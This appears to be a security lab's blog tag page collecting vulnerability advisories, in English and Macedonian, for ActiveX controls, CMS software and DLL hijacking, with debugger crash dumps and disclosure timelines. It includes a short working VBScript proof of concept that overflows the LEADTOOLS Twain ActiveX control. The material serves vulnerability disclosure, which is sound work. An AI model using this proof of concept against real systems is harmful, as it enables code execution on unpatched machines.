Posts Tagged ‘ risk

Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)

The ElonFmt ActiveX Control Module suffers from a buffer overflow vulnerability. When a large buffer is sent to the pid item of the GetItem1 function in elonfmt.ocx module, we get a few memory registers overwritten including the SEH. We’re dealing with a character translation. An attacker can gain access to the system on the affected node and execute arbitrary code.

—————————————————————–
CompanyName
FileDescription ElonFmt ActiveX Control Module
FileVersion 1, 1, 14, 1
InternalName ElonFmt
LegalCopyright Copyright (C) 2002 – 2008 Gesytec GmbH
OriginalFileName ElonFmt.OCX
ProductName ElonFmt ActiveX Control Module
ProductVersion 1, 1, 14, 1
—————————————————————–

Exception Code: ACCESS_VIOLATION
Disasm: AAAAAAAA ????? ()

Seh Chain:
————————————————–
1 7C9032BC ntdll.dll
2 AAAAAAAA

Registers:
————————————————–
EIP AAAAAAAA
EAX 00000000
EBX 00000000
ECX AAAAAAAA
EDX 7C9032BC -> 04244C8B
EDI 00000000
ESI 00000000
EBP 0013E7F8 -> 0013E8A8
ESP 0013E7D8 -> 7C9032A8

Block Disassembly:
————————————————–
AAAAAAAA ????? <--- CRASH ArgDump: -------------------------------------------------- EBP+8 0013E8C0 -> C0000005
EBP+12 0013ECF0 -> AAAAAAAA
EBP+16 0013E8DC -> 0001003F
EBP+20 0013E894 -> 7C96F3BC
EBP+24 AAAAAAAA
EBP+28 00000236

Stack Dump:
————————————————–
13EBA8 01 00 00 00 00 00 00 00 08 AF 47 00 81 18 C3 77 [……….G….w]
13EBB8 14 2C 00 00 A2 56 00 10 41 ED 13 00 E8 EB 13 00 […..V……….]
13EBC8 20 8F 63 01 B8 8E 63 01 81 18 C3 77 01 00 00 00 [..c…c….w….]
13EBD8 64 21 12 77 FF 00 00 00 74 E1 97 7C 51 7C 91 7C [d..w….t…Q…]
13EBE8 AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA […………….]

———————————————–

(fc.1608): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=cccccccc edx=7c9032bc esi=00000000 edi=00000000
eip=cccccccc esp=0013e7d8 ebp=0013e7f8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
cccccccc ?? ???
0:000> !exchain
0013e7ec: ntdll!ExecuteHandler2+3a (7c9032bc)
0013ecf0: cccccccc
Invalid exception stack at bbbbbbbb
0:000> u 0013ecf0
0013ecf0 bbbbbbbbcc mov ebx,0CCBBBBBBh
0013ecf5 cc int 3
0013ecf6 cc int 3
0013ecf7 cc int 3
0013ecf8 dddd fstp st(5)
0013ecfa dddd fstp st(5)
0013ecfc dddd fstp st(5)
0013ecfe dddd fstp st(5)

0:000> d esp
0013eb58 01 00 00 00 8d 61 53 80-7c 5a 63 af 00 00 00 00 …..aS.|Zc…..
0013eb68 88 d5 2e ba 00 00 00 00-24 46 53 8a 00 86 8f bf ……..$FS…..
0013eb78 a8 5a 63 af a8 5a 63 af-fb 0a 80 bf 60 29 53 89 .Zc..Zc…..`)S.
0013eb88 ce 86 8f bf 68 d5 2e ba-88 d5 2e ba 00 00 00 00 ….h………..
0013eb98 06 00 05 00 a1 00 00 00-2e 0e 73 74 d1 18 43 7e ……….st..C~
0013eba8 01 00 00 00 00 00 00 00-40 f7 47 00 81 18 c3 77 ……..@.G….w
0013ebb8 1a 03 00 00 a2 56 00 10-00 ed 13 00 e8 eb 13 00 …..V……….
0013ebc8 20 8f 63 01 b8 8e 63 01-81 18 c3 77 01 00 00 00 .c…c….w….
0:000> d
0013ebd8 64 21 12 77 ff 00 00 00-74 e1 97 7c 51 7c 91 7c d!.w….t..|Q|.|
0013ebe8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ebf8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec08 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec18 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec28 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec38 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec48 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0:000> d
0013ebe8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ebf8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec08 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec18 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec28 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec38 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec48 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec58 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0:000> d
0013ec68 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec78 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec88 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec98 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013eca8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ecb8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ecc8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ecd8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0:000> d
0013ece8 aa aa aa aa aa aa aa aa-bb bb bb bb cc cc cc cc …………….
0013ecf8 dd dd dd dd dd dd dd dd-dd ad d0 01 01 00 63 01 …………..c.
0013ed08 00 00 00 00 b8 8e 63 01-01 00 00 00 00 ed 13 00 ……c………
0013ed18 82 a5 00 10 8c ed 13 00-b8 8e 63 01 28 ee 13 00 ……….c.(…
0013ed28 00 00 00 00 80 02 63 01-80 ed 13 00 ae 43 dd 73 ……c……C.s
0013ed38 5c ed 13 00 d8 f0 00 10-02 00 00 00 d9 a3 00 10 \……………
0013ed48 80 02 63 01 24 8e 56 01-01 00 00 00 78 8e 63 01 ..c.$.V…..x.c.
0013ed58 48 ed 13 00 80 ed 13 00-98 f0 00 10 01 00 00 00 H……………

Advisory ID: ZSL-2011-5011
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5011.php

DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities

DoceboLMS suffers from multiple stored XSS vulnerabilities pre and post auth. Input thru the POST parameters ‘name’, ‘code’ and ‘title’ in index.php is not sanitized allowing the attacker to execute HTML code into user’s browser session on the affected site. URI based XSS vulnerabilities are also present.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5006.php

Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC

A buffer overflow vulnerability has been identified in Macro Express Pro, possibly this vuln may exist in the regular version and older versions of Macro Express and Macro Express Pro. We’ve reported the issue to the vendor thru their bug reporting system (http://www.macros.com/bugreport.htm) and did not receive any response for confirmation or cooperation.

We’ve managed to overwrite few registers while debugging the application, thus executed arbitrary code on the affected system.

You can take a look at the advisory here: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4986.php

Mantis Bug Tracker безбедносни предупредувања и закрпи

Денеска, Zero Science Lab во соработка со MantisBT Group објави безбедносни предупредувања и закрпи за популарниот систем за следење на грешки или багови MantisBT (отворен код). Се работи за неколку сериозни ранливости со чија помош, напаѓачот може да дојде до осетливи информации на заразениот систем со пропатување на директориуми или пак да извршува HTML код во корисничкиот прелистувач со помош на XSS напад.

Слабоста се наоѓа во “upgrade_unattended.php” скриптата, која се наоѓа во “admin” папката. При повикување на параметарот “db_type” било со GET или POST методата, апликацијата не извшува доволно и контролирано санирање на корисничкото внесување при што се откриваат системски информации.

По дефинирање, се работи за Reflected (Non-persistent) Cross-Site Scripting, Local File Inclusion/Disclosure и Path Disclosure ранливости. Ние извршивме тестирање на “live” веб-страници (со дозвола), и заклучивме да ги рангираме ранливостите како Medium Risk (xss) и High Risk (lfi).

Голема благодарност до Дејвид Хикс и Виктор Боктор од MantisBT групата, кои одговорија на пријавените слабости и реагираа во најбрз временски период како и во објавување на закрпа и предупредувања после кое следеше објавување на 1.2.4 верзијата. Иако Дејвид напоменуваше дека имало “Warning” дека папката “admin” треба да се избрише после инсталација, јас такво предупредување не видов поради различните оперативни системи и PHP пермисии, и заклучивме дека многу инсталации на интернетот (кои користат MantisBT) се со присатен “admin” фолдер.

Освен јавно објавените предупредувања, објавивме и официјален Google Dork на Exploit-DB заедницата: http://www.exploit-db.com/ghdb/3651/

Предупредувањата од ZSL како и од MantisBT можете да ги погледнете подолу:

ZSL-2010-4983: MantisBT <=1.2.3 (db_type) Cross-Site Scripting & Path Disclosure Vulnerability
ZSL-2010-4983: MantisBT <=1.2.3 (db_type) Local File Inclusion Vulnerability
MantisBT: http://www.mantisbt.org/bugs/view.php?id=12607

Ажурирајте. ;}

Exponent CMS v0.97 Multiple Vulnerabilities

Vendor: OIC Group Inc.
Product web page: http://www.exponentcms.org
Affected version: 0.97

Summary: Open Source Content Management System (PHP+MySQL).

Desc: Exponent CMS suffers from multiple vulnerabilities:

#1. Local File Inclusion / File Disclosure Vulnerability
#2. Arbitrary File Upload / File Modify Vulnerability
#3. Reflected Cross-Site Scripting Vulnerability

(1) LFI/FD occurs when input passed thru the params:
– “action”
– “expid”
– “ajax_action”
– “printerfriendly”
– “section”
– “module”
– “controller”
– “int”
– “src”
– “template”
– “page”
– “_common”

to the scripts:
– “index.php”
– “login_redirect.php”
– “mod_preview.php”
– “podcast.php”
– “popup.php”
– “rss.php”

is not properly verified before being used to include files.
This can be exploited to include files from local resources
with directory traversal attacks and URL encoded NULL bytes.

(2) AFU/E occurs due to an error in:
– “upload_fileuploadcontrol.php”
– “upload_standalone.php”
– “manifest.php”
– “delete.php”
– “edit.php”
– “manage.php”
– “rank_switch.php”
– “save.php”
– “view.php”
– “class.php”
– “deps.php”
– “delete_form.php”
– “delete_process.php”
– “search.php”
– “send_feedback.php”
– “viewday.php”
– “viewmonth.php”
– “viewweek.php”
– “testbot.php”
– “activate_bot.php”
– “deactivate_bot.php”
– “manage_bots.php”
– “run_bot.php”
– “class.php”
– “delete_board.php”
– “delete_post.php”
– “edit_board.php”
– “edit_post.php”
– “edit_rank.php”
– “monitor_all_boards.php”
– “monitor_board.php”
– “monitor_thread.php”
– “preview_post.php”
– “save_board.php”
– “save_post.php”
– “save_rank.php”
– “view_admin.php”
– “view_board.php”
– “view_rank.php”
– “view_thread.php”
– “banner_click.php”
– “ad_delete.php”
– “ad_edit.php”
– “ad_save.php”
– “af_delete.php”
– “af_edit.php”
– “af_save.php”
– “delete_article.php”
– “edit_article.php”
– “save_article.php”
– “save_submission.php”
– “submit_article.php”
– “view_article.php”
– “view_submissions.php”
– “coretasks.php”
– “htmlarea_tasks.php”
– “search_tasks.php”
– “clear_smarty_cache.php”
– “configuresite.php”
– “config_activate.php”
– “config_configuresite.php”
– “config_delete.php”
– “config_save.php”
– “examplecontent.php”
– “finish_install_extension.php”
– “gmgr_delete.php”
– “gmgr_editprofile.php”
– “gmgr_membership.php”
– “gmgr_savegroup.php”
– “gmgr_savemembers.php”

as it allows uploads of files with multiple extensions to a
folder inside the web root. This can be exploited to execute
arbitrary PHP code by uploading a specially crafted PHP script.

The uploaded files are stored in: [CMS_ROOT_HOST]\files

(3) XSS occurs when input passed to the params:
– “u”
– “expid”
– “ajax_action”
– “ss”
– “sm”
– “url”
– “rss_url”
– “lang”
– “toolbar”
– “section”
– “section_name”
– “src”

in scripts:
– “slideshow.js.php”
– “picked_source.php”
– “magpie_debug.php”
– “magpie_simple.php”
– “magpie_slashbox.php”
– “test.php”
– “fcktoolbarconfig.js.php”
– “section_linked.php”
– “index.php”

is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script
code in a user’s browser session in context of an affected site.

Tested on: Microsoft Windows XP Professional SP3 (English)
Apache 2.2.14 (Win32)
MySQL 5.1.41
PHP 5.3.1

Vendor status: [09.10.2010] Vulnerabilities discovered.
[10.10.2010] Vendor contacted.
[13.10.2010] No reply from vendor.
[14.10.2010] Public advisory released.

Advisory ID: ZSL-2010-4969
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4969.php

Vulnerabilities discovered by: Gjoko ‘LiquidWorm’ Krstic
liquidworm gmail com
Zero Science Lab – http://www.zeroscience.mk

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4969.php

Raw analysis (hi 5 John Leitch): Log_Exponent.txt (616 KB)

Softek Barcode Reader Toolkit ActiveX 7.1.4.14 (SoftekATL.dll) Buffer Overflow PoC

Vendor: Softek Software Ltd
Product web page: http://www.bardecode.com
Affected version: 7.1.4.14

Summary: The Softek Barcode Reader Toolkit for Windows is a SDK that enables applications
to extract barcode information from images. The API’s available in the toolkit include .net,
java, com, ocx and windows dll. The standard version includes support for both 1 and 2-D
barcodes and special features include the ability to split documents by barcode position.

Desc: The vulnerability is caused due to a boundary error in SoftekATL.DLL when handling the
value assigned to the “DebugTraceFile” property and can be exploited to cause a heap-based
buffer overflow via an overly long string which may lead to execution of arbitrary code.

————————————————————————–

(824.ce0): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=44444444 ecx=7ffdf000 edx=00470608 esi=00470000 edi=4444443c
eip=7c96fa89 esp=0013f0a0 ebp=0013f100 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!RtlpNtMakeTemporaryKey+0x7d45:
7c96fa89 0fb707 movzx eax,word ptr [edi] ds:0023:4444443c=????
0:000> g
(824.ce0): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=42424242 ecx=7ffdf000 edx=00470608 esi=00470000 edi=4242423a
eip=7c96fa89 esp=0013f0ac ebp=0013f10c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!RtlpNtMakeTemporaryKey+0x7d45:
7c96fa89 0fb707 movzx eax,word ptr [edi] ds:0023:4242423a=????
0:000> g
eax=00000000 ebx=00000000 ecx=7c800000 edx=7c97e120 esi=7c90de6e edi=00000000
eip=7c90e514 esp=0013fe5c ebp=0013ff58 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!KiFastSystemCallRet:
7c90e514 c3 ret

———————–

EIP 7C96FA89
EAX 00000001
EBX 42424242
ECX 7FFDD000 -> 0013F0FC
EDX 00470608 -> 00152CA0
EDI 42424239
ESI 00470000 -> 000000C8
EBP 0013F10C -> 0013F1F4
ESP 0013F0AC -> 00470000

————————————————————————–

Tested on: Microsoft Windows XP Professional SP3 (English)
Microsoft Windows Internet Explorer 8.0.6001.18702
Softek Barcode Reader 7.3.1

Advisory: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4965.php

Netautor Professional 5.5.0 (goback) XSS Vulnerability

Vendor: /digiconcept/
Product web page: http://www.digiconcept.net
Affected version: 5.5.0 and DW 5.3.1

Summary: Netautor Professional is an application server and
development environment. Netautor Professional was developed
to serve the practical needs of users, and was continuously
advanced.

Digital Workroom is a well proven and time-tested Content Management
System. It`s based on also digiconcept`s developed Application Server
“Netautor Professional” and PHP 5. The standard functional range covers
the majoritarian needs on Internet- and Intranet environments for publication
and communication.

Desc: Netautor Professional v5.5.0 suffers from a XSS vulnerability because
input passed via the “goback” parameter to login2.php script is not properly
sanitised before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user’s browser session in context of an
affected site.

Tested on: MS WinXP Pro SP3 (EN)
PHP 5.3.0
MySQL 5.1.36
Apache 2.2.11 (Win32)

Vendor status: [14.09.2010] Vulnerability discovered.
[15.09.2010] Contact with the vendor.
[17.09.2010] No reply from vendor.
[17.09.2010] Public advisory released.

Advisory: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4964.php

LEADTOOLS ActiveX Common Dialogs 16.5 Multiple Remote Vulnerabilities

Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected version: 16.5.0.2

Summary: With LEADTOOLS you can control any scanner, digital camera
or capture card that has a TWAIN (32 and 64 bit) device driver.
High-level acquisition support is included for ease of use while
low-level functionality is provided for flexibility and control in
even the most demanding scanning applications.

Desc: LEADTOOLS ActiveX Common Dialogs suffers from multiple remote
vulnerabilities (IoF, BoF, DoS) as it fails to sanitize the input in
different objects included in the Common Dialogs class.

Vulnerable Objects/OCX Dialogs (Win32):

1. ActiveX Common Dialogs (Web) ——————–> LtocxWebDlgu.dll
2. ActiveX Common Dialogs (Effects) —————-> LtocxEfxDlgu.dll
3. ActiveX Common Dialogs (Image) ——————> LtocxImgDlgu.dll
4. ActiveX Common Dialogs (Image Effects) ———-> LtocxImgEfxDlgu.dll
5. ActiveX Common Dialogs (Image Document)———-> LtocxImgDocDlgu.dll
6. ActiveX Common Dialogs (Color) ——————> LtocxClrDlgu.dll
7. ActiveX Common Dialogs (File) ——————-> LtocxFileDlgu.dll

Advisory: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4961.php

LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC

Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected Version: 16.5.0.2

Summary: With LEADTOOLS you can control any scanner, digital camera
or capture card that has a TWAIN (32 and 64 bit) device driver.
High-level acquisition support is included for ease of use while
low-level functionality is provided for flexibility and control in
even the most demanding scanning applications.

Desc: The Raster Twain Object Library suffers from a buffer overflow
vulnerability because it fails to check the boundry of the user input.

Tested On: Microsoft Windows XP Professional SP3 (EN)
Windows Internet Explorer 8.0.6001.18702
RFgen Mobile Development Studio 4.0.0.06 (Enterprise)

===============================================================

(2c4.2624): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000
eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!wcscpy+0xe:
7c912f4e 668901          mov     word ptr [ecx],ax        ds:0023:01649000=????
0:000> g
(2c4.2624): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041
eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!RtlpNtMakeTemporaryKey+0x6a74:
7c96c540 807b07ff        cmp     byte ptr [ebx+7],0FFh      ds:0023:00410040=??

==================================================================

Registers:
————————————————–
EIP 7C912F4E
EAX 00130041
EBX 100255BC -> 10014840 -> Asc: @H@H
ECX 01649000
EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EDI 00000000
ESI 0013EF6C -> BAAD0008
EBP 0013EDA8 -> 0013EDDC
ESP 0013EDA8 -> 0013EDDC

EIP 7C96C540
EAX 00410039
EBX 00410039
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97B5A0
EDI 00410041
ESI 00150000 -> 000000C8
EBP 0013F228 -> 0013F278
ESP 0013F220 -> 00150000

ArgDump:
————————————————–
EBP+8    016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12    0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16    00000000
EBP+20    0013EF6C -> BAAD0008
EBP+24    100255BC -> 10014840 -> Asc: @H@H
EBP+28    0013EDB8 -> 00000000

EBP+8    00150000 -> 000000C8
EBP+12    00410039
EBP+16    7C96DBA4 -> Asc: RtlGetUserInfoHeap
EBP+20    00000000
EBP+24    00410041
EBP+28    7C80FF12 -> 9868146A

CompanyName        LEAD Technologies, Inc.
FileDescription        LEADTOOLS ActiveX Raster Twain (Win32)
FileVersion        16,5,0,2
InternalName        LTRTNU
LegalCopyright        © 1991-2009 LEAD Technologies, Inc.
OriginalFileName        LTRTNU.DLL
ProductName        LEADTOOLS® for Win32
ProductVersion        16.5.0.0

Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False

Exception Code: ACCESS_VIOLATION

Disasm: 7C912F4E    MOV [ECX],AX    (ntdll.dll)
Disasm: 7C96C540    CMP BYTE PTR [EBX+7],FF    (ntdll.dll)

Exception Code: BREAKPOINT

Disasm: 7C90120E    INT3    (ntdll.dll)

Seh Chain:
————————————————–
1     7C839AC0     KERNEL32.dll
2     FC2950         VBSCRIPT.dll
3     7C90E900     ntdll.dll

7C912F4E    MOV [ECX],AX            <— CRASH
7C96C540    CMP BYTE PTR [EBX+7],FF        <— CRASH
7C90120F    RETN                <— CRASH

==================================================================

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
liquidworm gmail com

Zero Science Lab – http://www.zeroscience.mk

24.08.2010

Zero Science Lab Advisory ID: ZSL-2010-4960
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php

PoC:

<object classid=’clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F’ id=’target’ />
<script language=’vbscript’>

targetFile = “C:\Program Files\RFGen40\LtocxTwainu.dll”
prototype  = “Property Let AppName As String”
memberName = “AppName”
progid     = “LTRASTERTWAINLib_U.LEADRasterTwain_U”
argCount   = 1

arg1=String(9236, “A”)

target.AppName = arg1

</script>

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960_pvt.php

Multiple Vendors DLL Hijacking Exploits

Токму така :)

H D Moore (Metasploit Project) по изјавувањето дека пронашол 40-тина ранливости во Microsoft производи, на 22-ри август го објави и приборот за ревизија на DLL библиотеките и нивно “киднапирање” или hijacking. Се работи за DLLHijackAuditKit v2 со кој извршувате проверка за сите екстензии регистрирани во вашиот систем и нивни соодветни библиотеки, како и нивна експлоатација. Приборот се користи едноставно, ревизијата трае од 15-30 минути и потоа се креираат експлоатациски кодови во фолдер Exploits кои можете да ги користите за било какви цели :)

Повеќе: http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html и http://blog.metasploit.com/2010/08/better-faster-stronger.html.

Се разбира, тимот на Zero Science Lab за да не остане покус, изврши ревизија и на еден од своите лабораториските системи и пронајде доста ранливости кои следуваат…

- Adobe Device Central CS5 v3.0.1.0 (dwmapi.dll) DLL Hijacking Exploit

- Adobe Extension Manager CS5 v5.0.298 (dwmapi.dll) DLL Hijacking Exploit

- Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit

- CorelDRAW X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

- Corel PHOTO-PAINT X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

- Google Earth v5.1.3535.3218 (quserex.dll) DLL Hijacking Exploit

- Media Player Classic 6.4.9.1 (iacenc.dll) DLL Hijacking Exploit

- Microsoft Office PowerPoint 2007 v12.0.4518 (pp4x322.dll) DLL Hijacking Exploit

- Nullsoft Winamp 5.581 (wnaspi32.dll) DLL Hijacking Exploit

- Microsoft Visio 2010 v14.0.4514.1004 (dwmapi.dll) DLL Hijacking Exploit

Откако беше објавен DLL Hijack Audit Kit v2 приборот, во светот се објавија повеќе од 100-тина експлоити во рок од неколку дена, поради кое, Microsoft реагираше веднаш со објавување на алатка која ги заобиколуваше овие слабости.

Извор: http://www.computerworld.com/s/article/9181518/Microsoft_releases_tool_to_block_DLL_load_hijacking_attacks?taxonomyId=17&pageNumber=1

Алатката можете да ја преземете на следниов линк: http://support.microsoft.com/kb/2264107 (услов: валиден оперативен систем)

Вакви експлоити сеуште се објавуваат додека го читате текстов и е застрашувачки. Внимавајте од кого преземате податоци и бидете безбедни.

Досега, најбрзо објавување на ваквите експлоити можете да ги пратите на Exploit-DB: http://www.exploit-db.com/local/

Zero Science Lab